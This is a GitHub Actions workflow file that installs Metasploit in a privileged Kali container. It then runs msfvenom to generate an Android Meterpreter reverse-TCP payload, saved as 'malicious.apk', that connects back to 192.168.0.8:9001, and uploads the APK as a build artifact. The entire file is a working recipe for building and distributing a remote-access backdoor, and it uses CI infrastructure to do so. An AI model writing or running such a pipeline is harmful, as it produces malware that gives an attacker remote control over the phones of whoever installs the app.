name: CI

on:
  workflow_dispatch:
    

jobs:
  build_manual:
    runs-on: ubuntu-latest
    container:
      image: "kalilinux/kali-last-release:latest"
      options: --privileged
    steps:
      - run: apt-get update && apt-get install -y metasploit-framework
      - run: msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.0.8 lport=9001 R -o malicious.apk
      - name: upload
        uses: actions/upload-artifact@v4
        with:
          name: t
          path: malicious.apk